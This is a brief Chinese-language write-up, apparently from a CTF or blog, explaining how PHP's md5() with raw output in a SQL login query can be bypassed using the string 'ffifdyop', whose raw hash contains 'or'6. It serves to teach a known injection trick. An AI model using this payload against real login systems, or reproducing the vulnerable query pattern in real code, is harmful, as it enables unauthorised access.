1、后臺(tái)語(yǔ)句:? $sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'";
分析:在php 中.(點(diǎn)好)起連接的作用
? ? ? ? ? ? ?MD5( )函數(shù):

將密碼轉(zhuǎn)換成16進(jìn)制的hex值以后,再將其轉(zhuǎn)換成字符串后包含' 'or ' 6'<srash>?
SELECT * FROM admin WHERE pass=' 'or ' 6'<trash>
很明顯可以注入了。
難點(diǎn)就在如何尋找這樣的字符串,我只是順手牽羊,牽了一個(gè)。。
提供一個(gè)字符串: ffifdyop
md5后,276f722736c95d99e921722cf9ed621c
再轉(zhuǎn)成字符串:' ' 'or' 6<trach>
解析:存在? or? 即代碼的兩邊有一邊為真既可以繞過,<trach>其實(shí)為垃圾代碼沒有任何用的。
or 后面有6,非零值即為真。既可以成功繞過。